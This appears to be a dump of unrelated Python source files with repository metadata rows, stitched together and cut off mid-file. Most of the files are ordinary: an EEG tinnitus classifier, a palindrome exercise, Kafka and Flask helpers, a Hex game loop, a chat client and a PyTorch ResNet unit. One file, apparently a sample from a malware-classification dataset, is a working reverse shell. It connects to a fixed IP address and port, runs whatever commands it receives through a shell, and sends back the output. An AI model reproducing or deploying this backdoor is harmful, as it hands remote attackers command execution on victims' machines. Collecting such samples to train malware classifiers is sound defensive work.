    if outdir is not None:
        model_outdir = join(outdir, '%s %s %s %s' % (target_type, model, cv_check, resample))
        if not isdir(model_outdir):
            mkdir(model_outdir)
    print('%s: Running classification - %s %s %s %s' % (pu.ctime(), target_type, model, cv_check, resample))

    # Stratified k-fold keeps the (resampled) class balance in every fold.
    n_splits = 50
    skf = model_selection.StratifiedKFold(n_splits=n_splits, random_state=seed)
    skf.get_n_splits(x_res, y_res)

    fold_count = 0
    classifier_objects, classifier_coefficients, cm_dict, norm_cm_dict = {}, {}, {}, {}
    balanced_acc, chance_acc, f1_scores = [], [], []
    for train_idx, test_idx in skf.split(x_res, y_res):
        fold_count += 1
        print('%s: Running FOLD %d for %s' % (pu.ctime(), fold_count, target_type))
        foldname = 'Fold %02d' % fold_count

        # Stratified k-fold splitting
        x_train, x_test = x_res[train_idx], x_res[test_idx]
        y_train, y_test = y_res[train_idx], y_res[test_idx]

        # Feature selection is fit inside the fold to avoid leakage.
        if "categorical_sex_male" in feature_names:
            continuous_features = [f for f in feature_names if 'categorical' not in f]
            continuous_indices = [eeg_data.columns.get_loc(cont) for cont in continuous_features]
            categorical_features = [f for f in feature_names if 'categorical' in f]
            categorical_indices = [eeg_data.columns.get_loc(cat) for cat in categorical_features]
            x_train_fs, x_test_fs, cleaned_features = feature_selection_with_covariates(
                x_train, x_test, y_train, continuous_indices, categorical_indices, feature_names)
        else:
            x_train_fs, x_test_fs, cleaned_features = feature_selection_without_covariates(
                x_train, x_test, y_train, feature_names)

        if model == 'svm':
            predicted, coef_df, clf = svmc(x_train_fs, y_train, x_test_fs, cleaned_features)
            classifier_coefficients[foldname] = coef_df
        elif model == 'extra_trees':
            predicted, feature_importances, clf = extra_trees(x_train_fs, y_train, x_test_fs, cleaned_features)
            classifier_coefficients[foldname] = feature_importances
        elif model == 'knn':
            predicted, clf = knn(x_train_fs, y_train, x_test_fs)
        else:
            raise ValueError("Unknown model: %r" % model)
        classifier_objects[foldname] = clf

        # Calculating fold performance scores
        balanced, chance, f1 = calc_scores(y_test, predicted)
        balanced_acc.append(balanced)
        chance_acc.append(chance)
        f1_scores.append(f1)

        # Fold confusion matrix, plus a row-normalized copy (rows sum to 1).
        cm = metrics.confusion_matrix(y_test, predicted)
        normalized_cm = cm.astype('float')/cm.sum(axis=1)[:, np.newaxis]
        cm_dict[foldname] = pd.DataFrame(cm, index=clf.classes_, columns=clf.classes_)
        norm_cm_dict[foldname] = pd.DataFrame(normalized_cm, index=clf.classes_, columns=clf.classes_)

    # Saving performance scores
    f1_df, score_df = save_scores(f1_scores, balanced_acc, chance_acc, class_labels=clf.classes_)
    scores_dict = {'accuracy scores': score_df,
                   'f1 scores': f1_df}

    if model_outdir is not None:
        try:
            pu.save_xls(scores_dict, join(model_outdir, 'performance.xlsx'))
            # Saving coefficients (kNN produces none)
            if bool(classifier_coefficients):
                pu.save_xls(classifier_coefficients, join(model_outdir, 'coefficients.xlsx'))
            pu.save_xls(cm_dict, join(model_outdir, 'confusion_matrices.xlsx'))
            pu.save_xls(norm_cm_dict, join(model_outdir, 'confusion_matrices_normalized.xlsx'))
            # Saving classifier object
            with open(join(model_outdir, 'classifier_object.pkl'), 'wb') as file:
                pkl.dump(classifier_objects, file)
        except Exception as exc:
            # Best-effort persistence: report the failure instead of
            # silently discarding it.
            print('%s: Failed to save results to %s (%s)' % (pu.ctime(), model_outdir, exc))
    return scores_dict
def side_classification_drop_asym(ml_data, behavior_data, output_dir, models=None):
    """Classify tinnitus side after dropping asymmetric-percept subjects.

    Subjects labeled 'Right>Left' or 'Left>Right' are removed from both
    the feature matrix and the target vector, then `eeg_classify` is run
    for every model/resampling combination.

    BUG FIX: the original iterated resample methods [None, 'over',
    'under'], none of which `eeg_classify` accepts (it would hit an
    unbound `resampler`); use the names it actually understands.
    """
    print('%s: Running classification on tinnitus side, dropping asymmetrical subjects' % pu.ctime())
    ml_copy = deepcopy(ml_data)
    if models is None:
        models = ['extra_trees']
    resample_methods = ['no_resample', 'ROS', 'RUS']

    t = pu.convert_tin_to_str(behavior_data['tinnitus_side'].values.astype(float), 'tinnitus_side')
    t_df = pd.DataFrame(t, index=ml_copy.index)

    # Collect positional indices of asymmetric subjects, then drop the
    # corresponding rows from features and targets alike.
    asym_indices = []
    for asym in ['Right>Left', 'Left>Right']:
        asym_indices.extend([i for i, s in enumerate(t) if asym == s])
    asym_data = ml_copy.iloc[asym_indices]
    ml_copy.drop(index=asym_data.index, inplace=True)
    t_df.drop(index=asym_data.index, inplace=True)
    target_cleaned = np.ravel(t_df.values)

    for model in models:
        for res in resample_methods:
            eeg_classify(ml_copy, target_cleaned, 'tinnitus_side_no_asym', model, output_dir, resample=res)
# side_classification_drop_asym(ml_data, behavior_data, output_dir, models=models)
def type_classification_drop_mixed(ml_data, behavior_data, output_dir, models=None):
    """Classify tinnitus type after dropping mixed-type subjects.

    Subjects labeled 'PT_and_NBN' are removed from both the feature
    matrix and the target vector, then `eeg_classify` is run for every
    model/resampling combination.

    BUG FIX: the original iterated resample methods [None, 'over',
    'under'], none of which `eeg_classify` accepts (it would hit an
    unbound `resampler`); use the names it actually understands.
    """
    print('%s: Running classification on tinnitus type, dropping mixed type subjects' % pu.ctime())
    ml_copy = deepcopy(ml_data)
    if models is None:
        models = ['extra_trees']
    resample_methods = ['no_resample', 'ROS', 'RUS']

    t = pu.convert_tin_to_str(behavior_data['tinnitus_type'].values.astype(float), 'tinnitus_type')
    t_df = pd.DataFrame(t, index=ml_copy.index)

    # Drop rows whose tinnitus type is the mixed 'PT_and_NBN' category.
    mixed_indices = [i for i, s in enumerate(t) if s == 'PT_and_NBN']
    type_data = ml_copy.iloc[mixed_indices]
    ml_copy.drop(index=type_data.index, inplace=True)
    t_df.drop(index=type_data.index, inplace=True)
    target_cleaned = np.ravel(t_df.values)

    for model in models:
        for res in resample_methods:
            eeg_classify(ml_copy, target_cleaned, 'tinnitus_type_no_mixed', model, output_dir, resample=res)
# type_classification_drop_mixed(ml_data, behavior_data, output_dir, models=models)
def classification_main(covariates=True, n_iters=0):
    """Run the full classification battery over every target variable.

    Parameters
    ----------
    covariates : bool
        If True, age/sex/medication/smoking covariates are appended to the
        connectivity features.
    n_iters : int
        If non-zero, run a permutation test instead: the targets are
        shuffled `n_iters` times and the per-iteration scores pickled.
    """
    output_dir = './../data/eeg_classification'
    if not isdir(output_dir):
        mkdir(output_dir)

    print('%s: Loading data' % pu.ctime())
    behavior_data, conn_data = pu.load_data_full_subjects()
    ml_data_without_covariates = conn_data.astype(float)

    # Dummy-code binary covariates and prepend age.
    categorical_variables = ['smoking', 'deanxit_antidepressants', 'rivotril_antianxiety', 'sex']
    categorical_data = behavior_data[categorical_variables]
    dummy_coded_categorical = pu.dummy_code_binary(categorical_data)
    covariate_data = pd.concat([behavior_data['age'], dummy_coded_categorical], axis=1)
    ml_data_with_covariates = pd.concat([conn_data, covariate_data], axis=1)

    models = ['svm', 'extra_trees', 'knn']
    resample_methods = ['no_resample', 'ROS', 'SMOTE', 'RUS']

    # Build the dict of target vectors to classify.
    targets = {}
    side_data = pu.convert_tin_to_str(behavior_data['tinnitus_side'].values.astype(float), 'tinnitus_side')
    targets['tin_side'] = side_data
    type_data = pu.convert_tin_to_str(behavior_data['tinnitus_type'].values.astype(float), 'tinnitus_type')
    targets['tin_type'] = type_data

    # Tinnitus Questionnaire distress: binary split and 4-level grading.
    tq_data = behavior_data['distress_TQ'].values
    high_low_thresholds = [0, 46, 84]
    tq_high_low = np.digitize(tq_data, bins=high_low_thresholds, right=True)
    targets['TQ_high_low'] = tq_high_low
    grade_thresholds = [0, 30, 46, 59, 84]
    binned_target = np.digitize(tq_data, bins=grade_thresholds, right=True)
    tq_grade = ['Grade_%d' % t for t in binned_target]
    targets['TQ_grade'] = tq_grade

    # hads_thresholds = [8, 11, 21]  # 0-7 (normal); 8-10 (borderline); 11-21 (abnormal)
    # anx_binned = np.digitize(behavior_data['anxiety_score'].values.astype(float), bins=hads_thresholds, right=True)
    # dep_binned = np.digitize(behavior_data['depression_score'].values.astype(float), bins=hads_thresholds, right=True)
    # targets['hads_OVR'] = convert_hads_to_single_label(np.vstack((anx_binned, dep_binned)).T)

    if covariates:
        ml_data = ml_data_with_covariates
        cv_check = 'with_covariates'
    else:
        ml_data = ml_data_without_covariates
        cv_check = 'without_covariates'

    if n_iters != 0:
        # Permutation testing: shuffle targets, classify, pickle scores.
        # NOTE(review): eeg_classify is called without outdir here, so the
        # per-iteration Excel outputs are skipped by design.
        for model in models:
            for res in resample_methods:
                for target in targets:
                    target_data = targets[target]
                    perm_scores = {}
                    model_outdir = join(output_dir, '%s %s %s %s' % (target, model, cv_check, res))
                    if not isdir(model_outdir):
                        mkdir(model_outdir)
                    for n in range(n_iters):
                        perm_target = shuffle(target_data)
                        scores = eeg_classify(
                            ml_data,
                            perm_target,
                            target_type=target,
                            model=model,
                            resample=res)
                        perm_scores['Iter%05d' % n] = scores
                    with open(join(model_outdir, 'perm_scores.pkl'), 'wb') as file:
                        pkl.dump(perm_scores, file)
    else:
        # Standard (unpermuted) runs for every target/model/resampling combo.
        for target in targets:
            target_data = targets[target]
            for model in models:
                for res in resample_methods:
                    eeg_classify(ml_data, target_data, target_type=target, model=model, outdir=output_dir, resample=res)
    print('%s: Finished' % pu.ctime())
classification_main(covariates=True, n_iters=0)
classification_main(covariates=False, n_iters=0)
def test_gridsearch():
    """Ad-hoc experiment: grid-search an RBF-SVM's C on the side target.

    Builds a scale -> extra-trees feature selection -> GridSearchCV
    pipeline, fits it on SMOTE-resampled data, and prints the best
    parameters and score.  Not an automated test despite the name.
    """
    def gridsearch_pipe(cv=None):
        # Local imports keep this experiment self-contained.
        from sklearn.pipeline import Pipeline
        from sklearn.preprocessing import StandardScaler
        from sklearn.feature_selection import SelectFromModel
        from sklearn.ensemble import ExtraTreesClassifier
        from sklearn.model_selection import GridSearchCV
        from sklearn.svm import SVC

        kernel_range = ('linear', 'rbf')  # , 'poly']
        c_range = [1, 10, 100]  # np.arange(start=1, stop=100, step=10, dtype=int)
        # gamma_range = np.arange(.01, 1, .01)
        # NOTE(review): kernel_range is built but unused — the grid only
        # varies C over a fixed RBF kernel.
        param_grid = {'C': c_range}  # , 'gamma': gamma_range}  # , 'kernel': kernel_range}
        pipe = Pipeline([
            ('preprocess_data', StandardScaler()),
            ('feature_selection', SelectFromModel(ExtraTreesClassifier(random_state=13), threshold="2*mean")),
            ('grid', GridSearchCV(SVC(kernel='rbf'), param_grid=param_grid, cv=cv, scoring='balanced_accuracy'))])
        return pipe

    print('%s: Loading data' % pu.ctime())
    behavior_data, conn_data = pu.load_data_full_subjects()
    ml_data_without_covariates = conn_data.astype(float)
    side_data = pu.convert_tin_to_str(behavior_data['tinnitus_side'].values.astype(float), 'tinnitus_side')

    # Balance classes before splitting, as in eeg_classify.
    resampler = SMOTE(sampling_strategy='not majority', random_state=seed)
    x_res, y_res = resampler.fit_resample(ml_data_without_covariates, side_data)

    n_splits = 10
    skf = model_selection.StratifiedKFold(n_splits=n_splits, random_state=seed)
    skf.get_n_splits(x_res, y_res)

    pipe = gridsearch_pipe(cv=skf).fit(x_res, y_res)
    gridsearch = pipe[-1]
    best_params = gridsearch.best_params_
    print(best_params)
    best_score = gridsearch.best_score_
    print(best_score)
    print('%s: Finished' % pu.ctime())
test_gridsearch()
| [
"ian.abenes@gmail.com"
] | ian.abenes@gmail.com |
0fb0c324b7732ab490a71f2d069eca7673a43eb2 | 7a87119ef5d77a1b225aab45083a45dcd376684c | /6_palindroom.py | b71f3511d35f1b2ab48041d139ac45ce6325a707 | [] | no_license | astilleman/MI | 0e31e0f4098502e83a13805feae82e038c169bb7 | 1564fd28f759761c3e186d41107c9abff3b69070 | refs/heads/master | 2023-03-29T19:14:46.817308 | 2021-04-06T15:43:17 | 2021-04-06T15:43:17 | 337,495,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | """
Een palindroom is een string die hetzelfde leest van links naar
rechts, als omgekeerd. Enkele voorbeelden van palindromen zijn:
- kayak
- racecar
- was it a cat I saw
Schrijf een recursieve functie die een string vraagt aan de gebruiker en
nakijkt of deze string al dan niet een palindroom is. Indien de
ingevoerde string een palindroom is, moet de functie True teruggeven,
anders geeft de functie False terug.
Je mag ervan uitgaan dat de gegeven string geen spaties bevat.
Let op: Zorg ervoor dat je functie niet hoofdlettergevoelig is.
"""
def is_palindroom(string):
    """Recursively check whether `string` is a palindrome.

    The check is case-insensitive (as the assignment requires); the
    caller guarantees the string contains no spaces.  Returns True for
    the empty string and single characters.

    Fixes vs. the original:
    - the base case returned via exit(), aborting the whole program
      instead of returning True;
    - the recursion only dropped the first character (string[1:]), so
      e.g. "aba" was wrongly rejected; it must strip both ends;
    - comparisons are now lowercased for case-insensitivity.
    """
    if len(string) <= 1:
        # Empty or single-character strings are palindromes by definition.
        return True
    if string[0].lower() != string[-1].lower():
        return False
    # Outer characters match: recurse on the interior.
    return is_palindroom(string[1:-1])
# TESTS
assert is_palindroom("")
assert is_palindroom("a")
assert is_palindroom("aa")
assert not is_palindroom("ab")
assert is_palindroom("aba")
assert not is_palindroom("aab")
assert is_palindroom("kayak")
assert not is_palindroom("racehorse")
assert is_palindroom("racecar")
assert is_palindroom("wasitacatIsaw")
| [
"43027764+astilleman@users.noreply.github.com"
] | 43027764+astilleman@users.noreply.github.com |
72fdf7852141e481fa5be04b51142c750e6d858c | 0b4e0aced622f59061e93a68dc0556f467b8309f | /utilities/kafka_functions.py | 0951bc8fbb93d0446cbfd08310dd8bf5ed6eb0b3 | [] | no_license | JumaKahiga/cashcog | efbd7b387653745f459aa465d8d14cdca3d90e23 | fbb40a481a3122d30fd41d35da34480c3e943105 | refs/heads/develop | 2022-12-13T01:25:48.520910 | 2020-05-06T11:49:27 | 2020-05-06T11:49:27 | 226,367,108 | 0 | 0 | null | 2022-01-21T20:10:44 | 2019-12-06T16:20:08 | Python | UTF-8 | Python | false | false | 772 | py | from kafka import KafkaProducer
def publish_message(producer_instance, topic_name, key, value):
    """Publish one UTF-8 encoded key/value message to a Kafka topic.

    Errors are logged to stdout rather than raised (best-effort send);
    flush() forces the buffered send before returning.
    """
    try:
        key_bytes = bytes(key, encoding='utf-8')
        value_bytes = bytes(value, encoding='utf-8')
        producer_instance.send(topic_name, key=key_bytes, value=value_bytes)
        producer_instance.flush()
        print('Message published successfully.')
    except Exception as ex:
        print('Exception in publishing message')
        print(str(ex))
def connect_kafka_producer():
    """Create a KafkaProducer for the 'kafka:9092' broker.

    Returns
    -------
    KafkaProducer or None
        The connected producer, or None if the connection attempt failed
        (the error is logged so callers can degrade gracefully).

    The original placed ``return _producer`` inside a ``finally`` block,
    a pattern that silently swallows any in-flight exception; the returns
    are now explicit on each path.
    """
    try:
        return KafkaProducer(
            bootstrap_servers=['kafka:9092'], api_version=(0, 10))
    except Exception as ex:
        print('Exception while connecting Kafka')
        print(str(ex))
        return None
| [
"kabirumwangi@gmail.com"
] | kabirumwangi@gmail.com |
61a282f16b0983b3c5423e695cafa939076f1269 | dd7d625ba21c63184af482141dd0c530df21d34c | /horus/application/api/client.py | 542d3595bef5e9b4b118a0f59e2611e753e037ef | [] | no_license | juanvaes/horus | 3a333910faaa0e9e66274006689c29ff0e8428a9 | f14be3b408135ffd964d830e6b11c266b6bad286 | refs/heads/master | 2020-03-29T04:36:13.480690 | 2019-02-01T11:42:53 | 2019-02-01T11:42:53 | 149,539,108 | 0 | 0 | null | 2019-01-03T16:43:35 | 2018-09-20T02:22:45 | Python | UTF-8 | Python | false | false | 917 | py | from flask import jsonify, request
from application import session
from urllib.parse import urlparse
from application.api import appi
from application.models import Client
@appi.route('/clients', methods=['GET'])
def get_clients_all():
    """Return every client as JSON: {"data": [...]}."""
    clients = Client.get_all()
    # NOTE(review): debug print left in; consider removing or using a logger.
    print(clients)
    return jsonify({'data':clients})
@appi.route('/client/search', methods=['GET'])
def get_client():
return jsonify({'data':'proving'})
@appi.route('/client/', methods=['POST'])
def post_client():
    """Create a client from the JSON request body.

    Returns {"message": <result of Client.create>}; no input validation
    is performed before hydrating the model.
    """
    data = request.json # gets the data as dictionary
    client = Client()
    client.to_obj(data)
    response = Client.create(client)
    return jsonify({'message': response})
@appi.route('/client/', methods=['PUT'])
def put_client():
return jsonify({'message':'<h1> Client updated </h1>'})
@appi.route('/client/', methods=['DELETE'])
def delete_client():
return jsonify({'message':'<h1> Client deleted </h1>'})
| [
"juanvaes22@gmail.com"
] | juanvaes22@gmail.com |
2ba29bb6527519b7c9d06927fd4de577934867a1 | 4b8fe7722b590f061435e48a200a5e460c34e09d | /463.py | 4199d0fa3079a6cf9b57fc956709802f611759bd | [] | no_license | luyibo/leetcode | 79902b51092dba3b869c8b9c494c62f387808590 | dfc26b4ed5c7cfc7edad36e75edf6cabfae3bbb4 | refs/heads/master | 2021-05-15T01:11:20.419251 | 2016-12-29T01:56:44 | 2016-12-29T01:57:58 | 57,302,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | class Solution(object):
def islandPerimeter(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
land = 0
neighbour = 0
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] == 1:
land += 1
if i<len(grid)-1 and grid[i+1][j] == 1:neighbour += 1
if j<len(grid[0])-1 and grid[i][j+1] == 1:neighbour += 1
return land*4-neighbour*2
s = Solution()
s.islandPerimeter([[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]]) | [
"1428260548@qq.com"
] | 1428260548@qq.com |
174e5543c3d14be2f7973435e139bd2bb9bc19b5 | ef2f932655e4591c4f654431cd96eedd0af2b5ba | /tests/example.py | b717490fbd69d71977bed6f795fb9a7c57e8a744 | [
"MIT"
] | permissive | cair/hex-ai | b380447c6dd445452c161babefdfadf329e899fa | 70c134a1479b58634e62c845314c7536ad64e4be | refs/heads/master | 2021-08-03T02:37:13.928443 | 2021-07-26T19:58:51 | 2021-07-26T20:02:29 | 209,273,454 | 0 | 0 | MIT | 2021-04-19T17:44:02 | 2019-09-18T09:46:06 | C | UTF-8 | Python | false | false | 540 | py | from PyHex import Hex11 as Hex
if __name__ == "__main__":
    hg = Hex.HexGame()
    winner = -1
    # Play up to 10M random self-play games on an 11x11 board (PyHex.Hex11).
    for game in range(10000000):
        Hex.init(hg)
        player = 0
        while Hex.full_board(hg) == 0:
            # Players 0 and 1 alternate random legal placements.
            position = Hex.place_piece_randomly(hg, player)
            if Hex.winner(hg, player, position):
                winner = player
                break
            player = 1 - player
        # Only print games decided very early (board mostly still open).
        if hg.number_of_open_positions >= 75:
            print("\nPlayer %s wins!\n\n" % (winner, ))
            Hex.print(hg)
| [
"per@sysx.no"
] | per@sysx.no |
2a5f098970707ee38ff75ca8d29e49d273794e98 | 02fa673f9884afb39cfb3b0a933f31c0490e91ac | /run.py | 54db5923f0f4e7457078279564fb3963d12d1c2e | [] | no_license | morez-tvk/order | d8a1eac6a58150a9ccef244f1adb870cb5011446 | 022d72b3de662720dbbf64b996b149485fa089a8 | refs/heads/master | 2023-04-30T01:05:13.278301 | 2021-05-20T13:11:21 | 2021-05-20T13:11:21 | 289,751,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,620 | py | from flask import Flask, request, jsonify
import requests
from nahayat import NahayatNegar
import flask
import time
from multiprocessing import Process
import json
from LogMg import logger
# import requests
app = Flask(__name__)
app.config["DEBUG"] = True
import datetime
def input_validator(request):
    """Return True if the request body (``request.data``) parses as JSON.

    Catches only JSON/type errors — the original used a bare ``except:``,
    which would also swallow KeyboardInterrupt and genuine bugs.
    """
    try:
        json.loads(request.data)
    except (ValueError, TypeError):
        # ValueError covers json.JSONDecodeError; TypeError covers
        # non-str/bytes payloads.
        return False
    return True
oid = 0
orders = {}
l_o = {}
session = requests.Session()
@app.route('/nahayat_negar', methods=['post'])
def first_order():
    """Create ('set') or cancel a NahayatNegar order.

    'set' spawns a new Process running the order and returns its id;
    'cancel' tries to terminate a previously stored process.
    """
    global oid
    global l_o
    global orders
    if not input_validator(request):
        flask.abort(400, "The input should be json.")
    text_json = request.data
    data = json.loads(text_json)
    if data['status'] == 'set':
        oid += 1
        # time_period = data.get('tedad', 20)
        # delay = data.get('delay', 0)
        next_ot = data.get("next_ot")
        orders[oid] = NahayatNegar(data=data['json'], limit_time=data['time'],
                                   servers=data['servers'])
        # orders[oid].order(next_ot)
        t = Process(target=orders[oid].order, args=(next_ot,))
        t.start()
        print("wating ...")
        # orders [oid].multi_req (delay, time_period)
        # l_o[oid] = t
        # NOTE(review): the Process handle `t` is never stored (the
        # l_o[oid] = t line is commented out), so 'cancel' below can never
        # find it and will always abort with 500.
        return {'id': oid, 'status': 200}
    elif data['status'] == 'cancel':
        try:
            l_o[data['id']].terminate()
            l_o[data['id']].join(0)
            orders.pop(data['id'])
            return {"message": f"order {data['id']} deleted from queue"}
        except:
            # Any failure (missing id, dead process) is reported as 500.
            flask.abort(500, "No such order in queue")
@app.route('/get_next', methods=['post'])
def x():
    """Relay an order request, then forward the (updated) job to the next
    server in the chain.

    Posts to the upstream link, copies the returned orderTicket into the
    payload, and if more servers remain, re-posts the job to the next one
    with an incremented counter.
    """
    req = request.json
    logger.info('sending request')
    try:
        res = requests.post(req['link'], cookies=req['cookies'], headers=req['headers'], data=req['data'])
        ot = res.json()['customer']['orderTicket']
        req['data']['data']['orderTicket'] = ot
    except KeyError:
        # Response arrived but lacked the expected keys; log its body.
        logger.error(res.json())
    except Exception as e:
        # NOTE(review): if requests.post itself fails, `res` stays unbound;
        # the trailing try/except below silently absorbs the NameError.
        logger.error('whattttttttt')
    if req['counter'] + 1 < len(req['servers']):
        logger.info("sending to next one")
        session.post(f"{req['servers'][req['counter']]}:2021/get_next", json={
            "link": req['link'],
            "cookies": req['cookies'],
            "headers": req['headers'],
            "data": json.dumps(req['data']),
            "servers": req['servers'],
            "counter": req['counter'] + 1
        })
    try:
        logger.info(res.json())
    except Exception as e:
        pass
# app.run(host='0.0.0.0',port=2020)
| [
"tavakolian.mr@gmail.com"
] | tavakolian.mr@gmail.com |
66eef6585fd94f0ceff511a5bcdfafdbbc1d0330 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad382.py | 9b733b70a15ec41b80a16eccdf59369f39e4f4a9 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | import bz2
import threading
import socket
import subprocess
import lzma
import hashlib
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
05b6136d14b4fcea82c6f71e820305b667687133 | 48d6041a7744baa1a4c563380d00fed8ae66cb08 | /flo.py | 36c0373df517bd9d0e598b1336d24e74eb454906 | [] | no_license | gowtham-kingxo/Ubuntu_Installation_form | 34c7e35aa49a5165bf25d3d555742e3f9018bf4b | fcff2287bc8bdc4295e069367d6d68f60db17d71 | refs/heads/master | 2021-01-11T13:36:59.208082 | 2017-06-23T17:16:00 | 2017-06-23T17:16:00 | 95,014,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | x=input()
y=input()
print(x)
print(y) | [
"gowtham.gourov@gmail.com"
] | gowtham.gourov@gmail.com |
75b9354c43fbe2ada91b3db0a439507494e90df6 | 26e33f6491218e2a1c677e917742e42bfcd0eaa6 | /pychat/pychat/Assigner.py | 0c0de1a7f530f30c7eff31c170e55a5bfe4abd14 | [
"MIT"
] | permissive | fanjiamin1/cryptocurrencies | 4ef1f37b56dc3d098f3a47cbd198952da74ec635 | 2009ade60f74093ff9946b99ae45d2964f5a75ca | refs/heads/master | 2021-01-21T11:49:06.636178 | 2016-12-20T13:29:06 | 2016-12-20T13:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,394 | py | import socket
import sys
from pychat.crypto import AES as Cipher
from Crypto import Random
class Alice():
    """TCP client that sends AES-encrypted messages and proof-of-work tasks."""

    def __init__(self, key="0123456789defabc"):
        # 16-byte key for the AES wrapper from pychat.crypto.
        self.key = key
        self.cipher = Cipher(self.key)
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def connect(self, ip_address, port):
        """Open the TCP connection to Bob."""
        self.socket.connect((ip_address, port))

    def send(self, message):
        """Encrypt `message` and send it over the socket."""
        self.socket.sendall(self.cipher.encrypt(message))

    def assign(self,difficulty=10, prefix='thisiseasymonkey'):
        """Send a proof-of-work task as '<prefix> <difficulty>'.

        NOTE(review): the __main__ driver calls alice.assign(prefix,
        difficulty) positionally, which swaps these parameters — confirm
        the intended order.
        """
        print('in assign')
        self.send(prefix+' '+str(difficulty))
    #felt like this would do more...
if __name__ == "__main__":
args = sys.argv[1:]
try:
bob_ip = input("IP address: ")
bob_port = int(input("Port: "))
key = input("Encryption key: ")
except KeyboardInterrupt:
print()
print("No chatting with Bob today... </3")
sys.exit()
print("Attempting to connect to {} on port {}".format(bob_ip, bob_port))
alice = Alice() # key variable unused
try:
alice.connect(bob_ip, bob_port)
except:
print("Couldn't get a connection with Bob...")
sys.exit()
try:
while 1:
print("to send a proof of work task"
+"simply write 'task', you can also specify"
+"a 16 byte prefix and a number of zeroes"
+"to be found in a sha5 hash with that prefix"
+"by writing task(prefix,numzeroes)")
print("you can also send simple encrypted messages")
message=input("Message: ")
print(message)
print(message.lower())
print(message.lower()=='task')
istask=False
if message.lower()=='task':
istask=True
alice.assign()
elif message.lower()[:5]=="task(":
istask=True
prefix=message[5:21]
try:
difficulty=int(message[22:])
except ValueError:
istask=False
if istask:
alice.assign(prefix,difficulty)
if not istask:
alice.send(message)
except KeyboardInterrupt:
print()
print("That's enough chatting for now")
| [
"ivarr15@ru.is"
] | ivarr15@ru.is |
b10302ab2daca47e9bd8afe17228e2f901d2976a | d00b1e01f82076248eb07d6391fafabfbac74898 | /metadata/FrostNumber/hooks/pre-stage.py | 7f090d9c2b69e9473bb79627b7d4db1dbab856b5 | [
"MIT"
] | permissive | csdms/wmt-metadata | 9b922415faa397e3d5511f258e1a4fda846b78b7 | 39207acc376f1cd21b2ae1d5581a1e2c317a6441 | refs/heads/master | 2020-04-07T00:39:56.268862 | 2019-02-26T21:24:20 | 2019-02-26T21:24:20 | 51,040,972 | 0 | 0 | MIT | 2018-10-31T19:36:54 | 2016-02-04T00:23:47 | Python | UTF-8 | Python | false | false | 769 | py | """A hook for modifying parameter values read from the WMT client."""
import os
import shutil
from wmt.utils.hook import find_simulation_input_file, yaml_dump
from topoflow_utils.hook import assign_parameters
file_list = []
def execute(env):
    """Perform pre-stage tasks for running a component.

    Parameters
    ----------
    env : dict
        A dict of component parameter values from WMT.
    """
    # NOTE: `long` is a Python 2 builtin — this hook targets Python 2.
    env['end_year'] = long(env['start_year']) + long(env['_run_duration']) - 1
    env['fn_out_filename'] = 'frostnumber_output.dat'
    # Presumably populates the module-level `file_list` with the names of
    # file-type parameters — confirm against topoflow_utils.hook.
    assign_parameters(env, file_list)
    # Stage each referenced input file into the working directory.
    for fname in file_list:
        src = find_simulation_input_file(env[fname])
        shutil.copy(src, os.curdir)
    env['_file_list'] = file_list
    yaml_dump('_env.yaml', env)
| [
"mark.piper@colorado.edu"
] | mark.piper@colorado.edu |
a296c689355de9ff44465c89010087d206693bda | e15d63ccde04e7458bff5af1bdad63a5c699b489 | /example/Model_Conversion/mx2torch/retinaface_r50/res50_transfer_weight.py | 17e4e530621f5d1100de117f9e520503564c3aba | [
"WTFPL"
] | permissive | ddddwee1/TorchSUL | 775b6a2b1e4ab7aac25a3f0411de83affc257af5 | 6c7cd41b14fc8b746983e8b981d1ba4d08370ca2 | refs/heads/master | 2023-08-21T15:21:24.131718 | 2023-08-18T09:37:56 | 2023-08-18T09:37:56 | 227,628,298 | 13 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,870 | py | import numpy as np
from TorchSUL import Model as M
import torch
import torch.nn as nn
import torch.nn.functional as F
class Unit(M.Model):
    """Pre-activation ResNet bottleneck unit (BN -> ReLU -> 1x1/3x3/1x1 convs).

    When ``shortcut`` is True, a 1x1 projection conv matches the residual
    branch's channels/stride; otherwise the identity input is added.
    Returns both the unit output and the first 1x1 conv's activation
    (``x2``), which the enclosing Stage exposes as a lateral feature.
    """
    def initialize(self, chn, stride=1, shortcut=False):
        self.bn0 = M.BatchNorm()
        self.act = M.Activation(M.PARAM_RELU)
        self.c1 = M.ConvLayer(1, chn, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.c2 = M.ConvLayer(3, chn, stride=stride, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.c3 = M.ConvLayer(1, chn*4, usebias=False)  # bottleneck expansion: 4x channels
        self.shortcut = shortcut
        if shortcut:
            self.sc = M.ConvLayer(1, chn*4, stride=stride, usebias=False)
    def forward(self, inp):
        if self.shortcut:
            # Pre-activate once; both the residual branch and the
            # projection shortcut consume the activated tensor.
            inp = self.bn0(inp)
            inp = self.act(inp)
            x2 = x = self.c1(inp)
            x = self.c2(x)
            x = self.c3(x)
            sc = self.sc(inp)
            x = sc + x
        else:
            # Identity shortcut: the residual branch sees the
            # pre-activated input, the skip path uses the raw input.
            x = self.bn0(inp)
            x = self.act(x)
            x2 = x = self.c1(x)
